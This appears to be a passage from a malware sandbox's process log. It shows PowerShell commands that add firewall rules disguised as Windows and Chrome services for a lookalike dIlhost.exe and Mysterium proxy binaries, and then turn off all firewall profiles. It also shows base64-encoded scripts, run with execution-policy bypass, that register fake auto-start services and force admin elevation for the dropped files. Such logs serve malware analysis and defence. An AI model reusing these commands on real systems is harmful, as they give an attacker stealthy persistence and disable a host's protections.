 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h "   - G r o u p   " W i n d o w s   S e a r c h "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h   S e r v i c e "   - G r o u p   " W i n d o w s   S e a r c h   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e "   - G r o u p   " C h r o m e   U p d a t e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e   S e r v i c e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e   S e r v i c e "   - G r o u p   " C h r o m e   U p d a t e   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t _ l a u n c h e r _ t c p "   - D i s p l a y N a m e   " m y s t _ l a u n c h e r _ t c p "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t _ l a u n c h e r _ u d p "   - D i s p l a y N a m e   " m y s t _ l a u n c h e r _ u d p "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   U D P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t . e x e "   - D i s p l a y N a m e   " m y s t . e x e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t . e x e "   - D i s p l a y N a m e   " m y s t . e x e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   U D P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - D i s p l a y N a m e   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - G r o u p   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - L o c a l P o r t   8 0 ,   4 4 3 ,   2 0 2 0 ,   2 4 0 4 ,   3 3 3 3 ,   4 4 4 4 ,   5 5 5 5 ,   4 4 4 9 ,   4 0 5 0   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - D i s p l a y N a m e   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - G r o u p   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - L o c a l P o r t   8 0 ,   4 4 3 ,   2 0 2 0 ,   2 4 0 4 ,   3 3 3 3 ,   4 4 4 4 ,   5 5 5 5 ,   4 4 4 9 ,   4 0 5 0   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 S e t - N e t F i r e w a l l P r o f i l e   - P r o f i l e   D o m a i n , P u b l i c , P r i v a t e   - E n a b l e d   F a l s e 
 
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:5664
                                                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                          "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:5780
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcwBlAHIAdgBpAGMAZQBzACAAPQAgAEAAKAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgA7ACAARABpAHMAcABsAGEAeQBOAGEAbQBlAD0AIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiADsAIABCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAPQAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFIAZQBnAGUAZABpAHQAQwBhAGMAaABlACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIABDAGEAYwBoAGUAIABDAG8AbgB0AHIAbwBsACIAOwAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgA9ACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEMAYQBjAGgAZQAgAFIAZQBnAGkAcwB0AHIAeQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAEQAZQB2AEEAcwBzAG8AYwBNAGEAbgAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABEAGUAdgBpAGMAZQAgAEEAcwBzAG8AYwBpAGEAdABpAG8AbgAgAE0AYQBuAGEAZwBlAHIAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBOAGcAYwBDAHAAbQByAFMAdgBjACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUgBlAG0AZQBkAHkAUAByAG8AYwAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAFIAZQBtAGUAZAB5ACAAUAByAG8AYwBlAHMAcwBlAHMAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUgBlAG0AZQBkAHkAIABQAHIAbwBjAGUAcwBzAGUAcwAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAfQAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcwBlAHIAdgBpAGMAZQAgAGkAbgAgACQAcwBlAHIAdgBpAGMAZQBzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBOAGEAbQBlACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACQAcwBlAHIAdgBpAGMAZQAuAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUACgB9AAoA
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:5896
                                                                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                              "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:6012
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcABhAHQAaAAgAGkAbgAgACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABwAGEAdABoACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAkAHAAYQB0AGgAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgB9AAoA
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                  "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:1152
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
